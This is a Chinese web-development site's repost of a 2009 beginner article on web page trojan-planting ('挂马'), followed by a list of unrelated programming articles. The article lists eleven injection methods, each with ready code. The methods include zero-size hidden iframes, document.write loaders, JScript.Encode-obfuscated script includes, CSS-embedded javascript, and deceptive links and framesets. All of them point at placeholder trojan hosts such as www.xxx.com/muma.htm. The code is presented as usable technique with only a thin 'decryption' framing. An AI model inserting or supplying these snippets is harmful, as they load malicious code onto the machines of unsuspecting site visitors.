JavaScript
搜索
分类

网马解密大讲堂——网马解密初级篇

来源:ikaka.com 时间:2009-09-16 14:45:00 

一.  网页挂马的概念:

      网页挂马是指:在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行 * 等危险操作。

二.常见的网页挂马方式:

  • 框架挂马:

  <iframe src=http://www.xxx.com/muma.htm width=0 height=0></iframe>

2.  js文件挂马:

首先将以下代码: 

document.write("<iframe width=0 height=0 src='地址'></iframe>"); 

保存为xxx.js, 则JS挂马代码为:

<script language=javascript src=xxx.js></script> 

3. js变形加密

      <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

muma.txt可改成任意后缀

4. flash木马

 http://网页木马地址 插入木马地址 width=10 height=10", "GET" 宽度和高度,方式后面的照添,更改木马地址就可以了。

5. 不点出现链接的木马

<a href="http://www.163.com(迷惑的超级连接地址,显示这个地址指向木马地址)" > 页面要显示的内容 </a> 
<SCRIPT Language="JavaScript"> 
function www_163_com () 

var url="你的木马地址"; 
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no, 
menubar=no,scrollbars=no,resizable=no, 
copyhistory=yes,width=800,height=600,left=10,top=10"); 

</SCRIPT>

6.隐蔽挂马:

top.document.body.innerHTML=top.document.body.innerHTML+'\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>'

7.css中挂马:

body {background-image:url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

8.Java挂马:

<SCRIPT language=javascript>  
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");

  9.图片伪装:

<html> 
<iframe src="网马地址" height=0 width=0></iframe> 
<img src="图片地址"></center> 
</html>

10. 伪装调用:

  <frameset rows="444,0" cols="*"> 
  <frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> 
  <frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">

11.高级欺骗:

<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" > 页面要显示的内容</a> 
<SCRIPT Language="JavaScript"> 
function www_163_com () 

var url="网马地址"; 
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"); 

</SCRIPT>

1
2 下一页
标签:JavaScript,网马,解密,木马,挂马
0
投稿

猜你喜欢

  • MySQL如何解决DOS窗口乱码问题

    2024-01-22 11:44:56

  • Python ORM框架SQLAlchemy学习笔记之关系映射实例

    2022-06-22 23:39:04

  • mysql 列转行的技巧(分享)

    2024-01-18 09:54:13

  • 使用Title提升可访问性二

    2009-11-16 12:53:00

  • python同义词替换的实现(jieba分词)

    2022-02-10 20:58:00

  • python数据分析之线性回归选择基金

    2022-03-09 08:13:59

  • JS设置cookie、读取cookie、删除cookie

    2023-08-27 19:35:17

  • 基于ASPJPEG 制作了一个梦寐已久的批量水印工具步骤

    2011-02-28 10:39:00

  • Python操作SQLite简明教程

    2021-08-15 14:32:57

  • Python urllib3软件包的使用说明

    2023-08-04 13:51:31

  • 基于Vue+Openlayer实现动态加载geojson的方法

    2024-04-27 16:12:22

  • Pygame游戏开发之太空射击实战入门篇

    2023-07-17 23:12:42

  • Python minidom模块用法示例【DOM写入和解析XML】

    2021-04-22 23:28:19

  • getAllResponseHeaders获取网页的http头信息代码

    2010-03-31 14:31:00

  • win10环境下配置vscode python开发环境的教程详解

    2022-09-06 21:19:49

  • Trie树_字典树(字符串排序)简介及实现

    2022-02-22 23:18:23

  • python中利用xml.dom模块解析xml的方法教程

    2022-08-17 01:44:47

  • Python中将字典转换为XML以及相关的命名空间解析

    2022-07-22 20:05:03

  • Pytorch数据拼接与拆分操作实现图解

    2021-08-01 04:37:05

  • 全面了解CSS内置颜色(color)值

    2008-11-19 12:26:00
    • asp之家 网络编程 m.aspxhome.com